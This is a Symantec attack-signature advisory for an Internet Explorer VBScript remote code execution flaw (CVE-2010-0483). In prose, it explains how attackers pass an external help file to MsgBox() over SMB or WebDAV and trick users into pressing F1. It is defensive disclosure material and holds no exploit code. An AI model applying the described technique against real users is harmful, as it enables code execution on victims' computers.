1. Symantec/
  2. Security Response/
  3. Attack Signatures/
  4. Web Attack: IE VBScript CVE-2010-0483

Web Attack: IE VBScript CVE-2010-0483

Severity: High

This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening.

Description

This signature detects a remote code execution vulnerability in the Microsoft Internet Explorer.

Additional Information

Microsoft Internet Explorer is a browser for the Windows operating system.

Internet Explorer is prone to a remote code execution vulnerability when handling a VBscript 'MsgBox()' function. Specifically, attackers can specify an external help file (through SMB or WebDAV) as a parameter to the message box. When a victim clicks on the 'F1' key of the message box, the attacker supplied help file will execute with the permissions of the currently logged in user.

Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.

Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.

Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.

NOTE: This document previously mentioned a buffer-overflow affecting 'winhlp32.exe'. That issue has been moved to BID 38473 (Microsoft Internet Explorer 'winhlp32.exe' 'MsgBox()' Stack-Based Buffer Overflow Vulnerability) to better document it.

Response

Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: vuldb@securityfocus.com.
  • Twitter
  • Facebook
  • LinkedIn
  • Google+
  • YouTube